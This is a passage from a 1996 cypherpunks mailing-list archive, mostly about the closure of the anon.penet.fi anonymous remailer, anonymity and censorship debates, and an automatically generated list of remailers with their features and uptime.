>Maybe closing of anon.penet.fi will spur real interest from the unwashed
>alt.sex.* masses to the truly secure remailers.
Who knows; maybe the most effective way to fund "truly secure" (bwah-hah-ha)
remailers will turn out to be to carry phone sex advertising :-)
Or maybe somebody will build a decent digicash interface
to a remailer, which will help get digicash going now that
everybody who uses remailers will be looking for a new home.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Reassign Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: webmaster@online.barrons.com
Date: Mon, 2 Sep 1996 14:40:34 +0800
To: cypherpunks@toad.com
Subject: Your password for BARRON'S Online
Message-ID: <199609020420.AAA10320@online.barrons.com>
MIME-Version: 1.0
Content-Type: text/plain


Thank you for registering with BARRON'S Online!

THE USER NAME YOU HAVE CHOSEN IS cypherpunks
THE PASSWORD YOU HAVE CHOSEN IS cypherpunk

Please remember that your user name and password are case-sensitive (i.e. Bsmith is different than bsmith) and you should enter them as shown above.

Your user name is required in its exact form each time you want to use registered areas on our site (including the exact upper/lowercase combination). The same restriction applies to your password.

Your user name and password will allow you to access all of the features of BARRON'S Online.

The rest of this message contains information about using your password and user name on BARRON'S Online. You may find it helpful to save this message for future reference.


WHAT HAPPENS NOW?

1. Return to BARRON'S Online (www.barrons.com). You can use your password and user name to log in to any part of the site that requires registration (such as the Table of Contents, this week's stories, Dossiers and Market Day, and so on). The first time you go to one of these parts of BARRON'S Online, you will be prompted to enter your user name and password.

2. If you ever forget your password, or need any registration-related information, just click on the REGISTER button from the BARRON'S Online gateway page to find the help you need.

Welcome to BARRON'S Online... we look forward to seeing you again and again!

BARRON'S Online
Customer Service
barrons-support@www.barrons.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 2 Sep 1996 17:55:00 +0800
To: cypherpunks@toad.com
Subject: Re: It is good that anon.penet.fi has been closed!
Message-ID: <199609020724.AAA21368@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


In a challenging article posted 12:33 PM 9/1/96 -0500, 
ichudov@algebra.com (Igor Chudov) wrote:
>Yes, subject says it all. anon.penet.fi was a whole lot worse than
>cypherpunks remailers. It provided clueless users with no real security,
>because it stored return addresses and did not use chaining and
>encryption.

There are different reasons people use remailers, different
amounts of security they need, and different levels of security
that the remailers can provide.  Anon.penet.fi was a Good Thing.
It got a few hundred thousand people thinking about remailers,
and why they want them, and thinking they were good tools.
It helped the public learn that anonymity is useful for real people, 
and helped the public learn that they can't always believe an
email message is from the "person" on the From: line,
and that email and news postings aren't always authentic just
because they come out of a computer :-)

One way to provide privacy is through heavy mathematics;
for some people, and some threats, you need that.
Another way to provide privacy is through a trusted operator
who's willing to put up with a lot of crap to provide the service.
For many people, that's enough - not for people worried about
eavesdroppers and overthrowing governments, but enough for people
talking about their attitudes toward work and sex and drugs who 
don't want their email traced by their employers, nosy neighbors,
or local vice cops.  And part of this security is the willingness
to close down a popular service when it's security is threatened.

One feature that's really needed for many remailer applications
is reply addresses.  Doing that securely with cypherpunks-style 
remailers is hard; doing it securely with trusted-sysop remailers is
much easier, and even then there were occasional bugs, and plain surprises.
In general, anything that knows the return path is vulnerable;
if the person sending the reply knows the destination address,
which doesn't apply to many of the applications,
the remailer system in between can be secure, 
but otherwise you're not "truly secure" - only "pretty good".

Knowing what the users really want to do helps you do it more securely.
>From what I know of remailer history, the main original goal 
of the cypherpunks-style remailer was to provide
security against traffic analysis by eavesdroppers, rather than to
prevent the recipient from knowing the sender's address, though
everybody pretty quickly realized that the latter was an interesting
feature, especially coupled with posting to Usenet.
Learning the differences between what people will really do with
2-way remailers as opposed to 1-way remailers can be done
better with an easy-to-use 2-way remailer like penet.fi
which can get 500,000 (possibly duplicated) users than with
moderately complicated systems like alpha.c2.org or the really
complicated things that may be needed to get better security.

>Maybe closing of anon.penet.fi will spur real interest from the unwashed
>alt.sex.* masses to the truly secure remailers.
Who knows; maybe the most effective way to fund "truly secure" (bwah-hah-ha)
remailers will turn out to be to carry phone sex advertising :-)
Or maybe somebody will build a decent digicash interface
to a remailer, which will help get digicash going now that
everybody who uses remailers will be looking for a new home.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Reassign Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 2 Sep 1996 18:02:15 +0800
To: julf@penet.fi
Subject: Educating former anon.penet.fi users about other remailers
Message-ID: <199609020724.AAA21373@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I've gotten about 5 messages from daemon@anon.penet.fi
telling me that the remailer is closed; don't know if they're
from various previous identities, or if they're from
postings to mailing lists with anonymous people on them, or whatever.

If somebody were to put together a one-page note on other remailers,
would it make sense to send it to all the penet.fi users?
A canonical cypherpunks approach would be to just write one and
send it to na000001@anon.penet.fi ..... na600000@anon.penet.fi,
but I assume either my system or Julf's would decide it was spam
and discard it (even if it were split up into 60,000 10-message chunks.)
The press release on www.penet.fi does contain pointers to the FAQs,
but people have to go looking for that.  On the other hand,
if there are an extra 10,000 hits per day on alpha.c2.org
because of a really well-written one-page blurb, can it handle the load?

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Reassign Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Mon, 2 Sep 1996 00:47:56 +0800
To: patrickbc@juno.com (patrick b cummings)
Subject: Re: hackerlist
In-Reply-To: <19960831.074413.9510.2.patrickbc@juno.com>
Message-ID: <199609011450.AAA22573@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> I am planning to make a list of hackers and would appreciatte it if you
> would e-mail me with the following information.
> handle
> e-mail
> city,state
> url
> whether or not you would like to recieve the list when finished
>                                    thanks for your help
>     P. Cummings
>     Patrickbc@juno.com

Are you on this list of morons?

-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 2 Sep 1996 22:06:21 +0800
To: cypherpunks@toad.com
Subject: Re: Sen. Leahy's "impeccable cyberspace credentials"
In-Reply-To: <Pine.SUN.3.95.960902042514.24113C-100000@netcom18>
Message-ID: <eN5LTD50w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jonathon <grafolog@netcom.com> writes:

> On Sun, 1 Sep 1996, James A. Donald wrote:
>
> > > I agree with what you are saying but not all polititions are that bad.
> > > You make it sound as if their are no politisions are for freedom of the
> > > net.
> > So who is the exception?
>
> 	Harry Browne  Libertarian Party Candidate.

Harry Browne is a fucking statist.  All politicians are scum.  No exceptions.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 2 Sep 1996 22:06:28 +0800
To: cypherpunks@toad.com
Subject: Re: Free Speech and List Topics
In-Reply-To: <ae4fb1c304021004792c@[207.167.93.63]>
Message-ID: <DT5LTD51w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
> More disturbing to me recently has been the steady increase in subscribers
> to this list who don't seem to value free speech very highly, who write of
> their own nation's censorship as valiant efforts to protect citizen-units
> from foreign devils, and, even more shockingly, from supposed defenders of
> electronic freedom who are now talking about the need for limits on
> anonymity.

The Freedom Knights are the only true defenders of True Free Speech.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 2 Sep 1996 17:17:27 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "Security risks" vs. "credit risks"
In-Reply-To: <ae4e076b0102100432c4@[207.167.93.63]>
Message-ID: <Pine.SUN.3.94.960902023632.26034A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 31 Aug 1996, Timothy C. May wrote:

> I find the notion that one's speeches and Usenet utterances could "harm
> one's security rating" a distasteful idea, but so long as such security
> ratings are handled by private players, and used by private players, I see
> no illegality.

Yet another reason to be a pseudonym in the United States.

I tend to agree with Mr. May.  I don't really care who has "access" to
information provided they do not have access to government collection
resources.  The former can be detered suiimply by taking measures to
prevent your information from being introdued into the system.  They only
get what you give them.  The second would be more disturbing.

One only deserves what privacy one secures for one's self.

> 
> --Tim May
> 
> We got computers, we're tapping phone lines, I know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Licensed Ontologist         | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrickbc@juno.com (patrick b cummings)
Date: Mon, 2 Sep 1996 17:15:47 +0800
To: bugtraq@netspace.org
Subject: free speech online
Message-ID: <19960901.014144.9678.2.patrickbc@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


I agree that their should be free speech on the net.  Someone should
start a petition and get as many people to sign it as possible.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 2 Sep 1996 17:33:27 +0800
To: Esther Dyson <edyson@edventure.com>
Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi
In-Reply-To: <19960901220323595.AAA208@Esther.edventure.com>
Message-ID: <Pine.SUN.3.94.960902024727.26034B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 1 Sep 1996, Esther Dyson wrote:

> Now, speaking personally: I believe there are trade-offs -- which is what I
> told the LA Times.  I assume I was quoted accurately (although the word
> "enforce" is awkward), but out of context.   Anonymity can be dangerous --
> as can traceability, especially in/by repressive regimes.  Therefore I would
> favor allowing anonymity -- with some form of traceability only under terms
> considerably stronger than what are generally required for a wiretap.
> Anyone who seriously needs anonymity because of a repressive government is
> likely to use a foreign (outside whatever jurisdiction he fears) server, so
> that this is not a matter of "local" laws.  The tracer would have to pass
> through what I hope would be tighter hoops than we have now.  
> 
> Please note that this is not the same as the right to *private*
> conversations and the use of encryption; this is the issue of being
> accountable for what you publish in public.  

I've left the attributation list open because I think my view a majority
one.

The inclinations I had to be involved with or financially support EFF are,
after reading this, entirely quashed.

What is or is not your personal or EFF's official position is meaningless.
It is clear that the personal beliefs of those involved in EFF are
those of compromise, present day politics, and a general lack of moral
fiber.

The political assumptions and the degree of technical invasion that would
make the above scheme possible are either hopelessly naive, or insidiously
invasive.
 
A scheme to make every net goer traceable (albut with some undefined
mechanism to "safeguard" against abuse) is, even in its core requirements,
frightening.

Whatever respect I had for EFF collectively and the individuals working
within the organization is much deminished, if it survives at all.

> Yes, I'm aware of the complexities, and of the possibilities for
> miscarriages of justice.

Yet you address this where exactly, even now in your "apology" or
"explanation" statement?

> Speaking for myself, only (and publicly),
> Esther Dyson

Perhaps you should have spoken publically but anonymously the first time?
Having not done so, I think you have damaged yourself as well as EFF.

> Esther Dyson				Always make new mistakes!

I find the above amusing.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <MAILER-DAEMON@mqg-smtp3.usmc.mil>
Date: Mon, 2 Sep 1996 17:47:32 +0800
To: <cypherpunks@toad.com>
Subject: Undeliverable Message
Message-ID: <vines.Afe5+ePc8mB@mstrinet.usmc.mil>
MIME-Version: 1.0
Content-Type: text/plain


To:            <cypherpunks@toad.com>
Cc:            
Subject:       Re: It is good that anon.penet.fi has been closed!

Message not delivered to recipients below.  Press F1 for help with VNM
error codes.               

	VNM3043:  BANYAN SERVER@MAG26@2DMAW NEW RIVER


VNM3043 -- MAILBOX IS FULL

   The message cannot be delivered because the
   recipient's mailbox contains the maximum number of 
   messages, as set by the system administrator.  The
   recipient must delete some messages before any
   other messages can be delivered.
    The maximum message limit for a user's mailbox is 
   10,000.  The default message limit is 1000 messages.  
   Administrators can set message limits using the 
   Mailbox  Settings function available in the 
   Manage User menu  (MUSER). 

   When a user's mailbox reaches the limit, the 
   user must delete some of the messages before 
   the mailbox can accept any more incoming messages.

UNDEFINED-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 1 Sep 1996, Igor Chudov @ home wrote:

> I believe that Private Idaho is a cypherpunks remailer client for Windows.

True.  But it is a seperate program from email clients which means that anyone
wanting to use Private Idaho has to download it, install it, and learn how to
use it in conjunction with one's email program.  Most people who may have a
need for anonymity have probably never heard of PGP or Private Idaho.  I
think that until remailer functions are actually built into the programs that
people use, remailer use will be rare.

- -- Mark

PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMipNqizIPc7jvyFpAQFy0Qf+LbMgy3PBJ+ipGbxblKbjEm09aiziLEpD
p7JCudf6TrBUdF+2PwTdxK/sOCITE9lTwbycAgeCvEYNUJEbsR3a6ix5fxbQuF8p
Y9/tEbLVESUz0/+UthVnBasbFsCOzHV+ztlIRIk8SEEJKxsu8cNRZqcjaAqH5Q1A
dmBKZ9KGQWPNuc5oLfqahyzroa8kAG59HSDm+ntV9fwduKNi8wSV6WFmA2s9pnZa
+yRRXmSm4PkWVXgNdQCosTTcD1enSIBcH2WAQu1jpDZbbs6+6v1KvdPa5+WOvTs3
kpBfFBlsmVkWJS63ouqDb7yihoq/qZvhyE2Fske8uVYh9M5Ffn9AKg==
=md6D
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <MAILER-DAEMON@mqg-smtp3.usmc.mil>
Date: Mon, 2 Sep 1996 17:52:11 +0800
To: <cypherpunks@toad.com>
Subject: Undeliverable Message
Message-ID: <vines.Afe5++Qc8mB@mstrinet.usmc.mil>
MIME-Version: 1.0
Content-Type: text/plain


To:            <cypherpunks@toad.com>
Cc:            
Subject:       Re: DON'T Nuke Singapore Back into the Stone Age

Message not delivered to recipients below.  Press F1 for help with VNM
error codes.               

	VNM3043:  BANYAN SERVER@MAG26@2DMAW NEW RIVER


VNM3043 -- MAILBOX IS FULL

   The message cannot be delivered because the
   recipient's mailbox contains the maximum number of 
   messages, as set by the system administrator.  The
   recipient must delete some messages before any
   other messages can be delivered.
    The maximum message limit for a user's mailbox is 
   10,000.  The default message limit is 1000 messages.  
   Administrators can set message limits using the 
   Mailbox  Settings function available in the 
   Manage User menu  (MUSER). 

   When a user's mailbox reaches the limit, the 
   user must delete some of the messages before 
   the mailbox can accept any more incoming messages.

UNDEFINED-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 2 Sep 1996, James Seng wrote:

> Now, what makes you think that citizen of Country A has the power or 
> rights to tell politicians of Country B what to do and what they cannot do?
> Just wondering.

I have every right as a citizen of country A to tell politicians of country B
what they should or shouldn't do.  This isn't about American Ideology; it's
about natural rights.  Politicians of country B can refuse to listen to me or
attempt to prevent my corrupt ideas from polluting the minds of its citizens,
but they won't succeed very well with the latter.  Of course, politicians may
be satisfied with making sure that only the most determined citizens will be
able to access information they don't want citizens to access, but as
technology progresses, it will become much more difficult to prevent this
information from spreading to the masses.

> 
> ps: Sorry for the off-topic discussion.

Cpunks is certainly not the best place to be discussing free speech.  However,
the link between free speech and the spread of cryptographic technology is too
close to completely overlook.

- -- Mark

PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMipSASzIPc7jvyFpAQFYyAgAuy7FvTpGHqYHi9zw3FMiea2tLnYVWPU6
D6VrGvN5NxRtTE8yW3eKrc1iU/0jQIVxHtUhHcodbPfvGqEtwuZKKbbknNj5GmzS
pmhcYPguXDwlXL4m3IjxEvhPg7GZ7tjbhXlPK7ADu0EHxvjwesAcrKyCPddu0i9U
e83bo3Q4vBT75WPVpSI1i6jJmC7ql4s3GZVvP2Qf6hzvu9fwSKbAra0ZLBFVKf25
WKwNK2eTVBcQOYytwXOQmdSV/hgFB/Y2T6+PHgnAjaDVeX3WqUuxggk6DpBY2V8g
bORwsuZyweJviVZIOjbLx6RDeNJQWWSjUCojHvJyKzqffg23Fi8bAw==
=+23m
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Mon, 2 Sep 1996 14:27:34 +0800
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: Bob Dole on Drugs
In-Reply-To: <199609011633.LAA30982@manifold.algebra.com>
Message-ID: <Pine.SUN.3.95.960902041419.24113A-100000@netcom18>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 1 Sep 1996, Igor Chudov @ home wrote:

>    during which he's expected to propose that the
>    military be enlisted to assist in a renewed war on
>    drugs. 


	Question:  Since the military, or more specifically,
	the CIA imports most of the drugs into the US, just which
	part of the military is going to declare war on which part
	of the military?  

	Or is all that going to get swept under the rug, so that 
	the ripocrats can further enslave the american population?

        xan

        jonathon
        grafolog@netcom.com




	However, if you're tired of the Lesser of N evils, 
	Cthulu's export policy is that you can't escape 
	anyway, and your puny mortal lives will be absorbed 
	along with his morning coffee.  Your encryption 
	technology is futile against the Elder Gods, and the 
	arcane formulas in the Cyphernomicon of that mad 
	physicist Tim The Enchanter may summon spirits from 
	the vasty deep, but no secrets are safe from 
	Nyarla-S-Ahothep who knows all and sees all.
				Bill Stewart






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Mon, 2 Sep 1996 14:32:52 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Sen. Leahy's "impeccable cyberspace credentials"
In-Reply-To: <199609012034.NAA11901@dns1.noc.best.net>
Message-ID: <Pine.SUN.3.95.960902042514.24113C-100000@netcom18>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 1 Sep 1996, James A. Donald wrote:

> > I agree with what you are saying but not all polititions are that bad. 
> > You make it sound as if their are no politisions are for freedom of the
> > net.
> So who is the exception? 

	Harry Browne  Libertarian Party Candidate.


        xan

        jonathon
        grafolog@netcom.com




	However, if you're tired of the Lesser of N evils, 
	Cthulu's export policy is that you can't escape 
	anyway, and your puny mortal lives will be absorbed 
	along with his morning coffee.  Your encryption 
	technology is futile against the Elder Gods, and the 
	arcane formulas in the Cyphernomicon of that mad 
	physicist Tim The Enchanter may summon spirits from 
	the vasty deep, but no secrets are safe from 
	Nyarla-S-Ahothep who knows all and sees all.
				Bill Stewart






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Mon, 2 Sep 1996 15:03:16 +0800
To: James Seng <jseng@pobox.org.sg>
Subject: Re: DON'T Nuke Singapore Back into the Stone Age
In-Reply-To: <Pine.BSF.3.91.960902061444.12103A-100000@icg.irdu.nus.sg>
Message-ID: <Pine.SUN.3.95.960902042931.24113D-100000@netcom18>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 2 Sep 1996, James Seng wrote:

> Most importantly, the move to censor certain WWW site actually comes as a 
> relieve to many people, especially parents who worried about the bad 

	And it is a pain for people whodevelop websites.

	To avoid offending those who are easilly offended, I 
	either have to put up a stupid << and very misleading warning
	label >> or block them out.

	My solution is to put up the misleading, and incredibly stupid
	"warning" label.   << Stupid & misleading, because although
	my pages do violate the CDA, and most other countries statues
	on what is acceptable content, the same text, if written
	would not even be given a second glance -- except maybe by 
	the humint part of that country, who would use it for training 
	purposes. >> 

> for artistic which rules out soft-porn. It may be surprising but many
> people (in Singapore) do welcome censorship sad to say.

	And what will happen to Singapore when "their beloved leader"
	dies, especially if a result of an assasination?   

> passive manner. They _do not_ read every issue of every magazine available
> in Singapore. They only do so when there is enough complains. For example,

	IOW, the newspapers, etc have to either not print stories that
	may cause complains, or print them, and go to jail.

	Censorship at its most vicious, and the most destructive of
	both the society it tries to appease, and the individual who
	doesn't conform to its sheere stupidity.  

> One more point. They know it is impossible to censor everything. It is

	And passing laws that are unenforceably, is simply another way 
	to ensure that laws in general are ignored, which leads to the
	increased instability of the regime, which leads to the precise
	opposite effect of what usually is intended. 

        xan

        jonathon
        grafolog@netcom.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Mon, 2 Sep 1996 14:11:03 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: FLT 800: From the Rumor Mill...
Message-ID: <199609020352.FAA29463@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


"Angelos D. Keromytis" <angelos@gradin.cis.upenn.edu> writes:

>This has happened before; an Aegis ship in the Persian Gulf shot down
>an Iranian Airlines (or whatever it's called) aircraft; i'm not sure
>how many died in that incident (i think about 70 - can very well be
>wrong). The US just "apologized" for the mistake AFAIK.
>- -Angelos

Well, not quite the same situation. IIRC, the Iranian aircraft refused to respond to challenges. The captain of the Vincennes added that to the info that the Aegis system was giving him, and decided the aircraft was a threat. Turn a key, push a button, and so long, Airbus. (There was also some discussion about whether the Airbus had military IFF gear aboard that may have led the captain to think it was a warplane, but I don't remember if anything came of it.)

The Iranian Airbus was also flying out of what was essentially "hostile" airspace. Despite the massive number of "terrorists" who live here -- at least according to the popular press -- I don't think the Navy has taken the step of declaring CONUS to be a hostile territory. :-)

Feel free to correct my memory if I'm wrong.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Tue, 3 Sep 1996 00:40:06 +0800
Subject: Re: Sharp Knives
In-Reply-To: <Pine.HPP.3.91.960902134028.4162B-100000@cor.sos.sll.se>
Message-ID: <199609021338.GAA29868@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


!  "James A. Donald" <jamesd@echeque.com>, writes:
!  >I heard on talk.politics.guns somebody say that in Sweden they
!  >had banned knives with a sharp point at the end, and were going
!  >to ban sharp knives altogether.  I think he was just engaging in
!  >hyperbole, that he really meant that gun control in Sweden was
!  >unreasonably strict, but on reflection I am not sure.
! 
! There is a law in Sweden, some 5 years old, against carrying
! 'dangerous devices' (hunting knives, Ninja stars etc) in 'public
! places' (unless you are a carpenter, electrician or some such
! going about your business). It's okay to carry a knife when
! going fishing/hunting or sitting on your terrace carving totem poles.
! It's only a misdemeanour and might be punished with a fine,
! but usually the cops just use the law to disarmour street gangs
! on the spot. The effects of the law are dubious. Knives have come
! into fashion among teenagers after this legislation (but not as
! a consequence of it, I think).

In California, it's a felony to merely *own* a Ninja star.  It's a
felony to carry a *concealed* knife, but carrying it openly in a 
holster is legal.  It's a felony for most people to carry a 
concealed loaded handgun on the street only on a *second* offense.
It'a a felony to merely *own* a switchblade, brass knuckles, etc.
Do our weapons laws sound strange?  Are many of our weapons laws
stricter than countries like Sweden?  Yes!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 3 Sep 1996 00:36:11 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199609021350.GAA03391@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.jpunix.com> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = "<remailer@meaning.com> cpunk pgp hash latent cut";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"ncognito"} = "<ncognito@rigel.cyberpass.net> mix cpunk pgp hash latent";
$remailer{"lucifer"} = "<lucifer@dhp.com> cpunk mix pgp hash latent cut ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash latent cut ek";
$remailer{"winsock"} = "<winsock@c2.org> cpunk pgp hash cut ksub reord";
$remailer{'nym'} = '<config@nym.alias.net> newnym pgp';
$remailer{"balls"} = "<remailer@huge.cajones.com> cpunk pgp hash latent cut ek";
$remailer{"squirrel"} = "<mix@squirrel.owl.de> cpunk mix pgp hash latent cut ek";
$remailer{"middle"} = "<middleman@jpunix.com> cpunk mix pgp hash middle latent cut ek reord";
$remailer{'cyber'} = '<alias@alias.cyberpass.net> alpha pgp';
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(cyber mix)

The alpha and nymrod nymservers are down due to abuse. However, you
can use the cyber nymserver. The nym.alias.net server will be listed
soon. See http://www.cs.berkeley.edu/~raph/n.a.n.html for details.

403 Permission denied errors have been caused by a flaky disk on the
Berkeley WWW server. Hopefully, this is fixed by now.

The penet remailer is closed.

Last update: Mon 2 Sep 96 6:45:14 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
mix      mixmaster@remail.obscura.com     -+++++-+++++  1:38:18  99.98%
jam      remailer@cypherpunks.ca          .*****-+**+*    28:42  99.98%
exon     remailer@remailer.nl.com         ***--**+****     3:33  99.98%
squirrel mix@squirrel.owl.de              +-+------.+   2:37:06  99.96%
cyber    alias@alias.cyberpass.net             +-+*+**    38:49  99.96%
middle   middleman@jpunix.com               ---- --+++    55:25  99.69%
replay   remailer@replay.com              +* *-**+***      6:15  99.36%
amnesia  amnesia@chardos.connix.com       - -----+---   3:24:36  99.35%
lead     mix@zifi.genetics.utah.edu       +++--+-+++++    48:39  99.23%
winsock  winsock@c2.org                   -  -----+--   5:46:31  98.94%
balls    remailer@huge.cajones.com        # **-**+****     5:32  98.70%
nemesis  remailer@meaning.com             ****- ++****    23:48  98.46%
extropia remail@miron.vip.best.com          -..------   4:55:14  94.02%
haystack haystack@holy.cow.net            *#*  ##+###     10:59  90.11%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
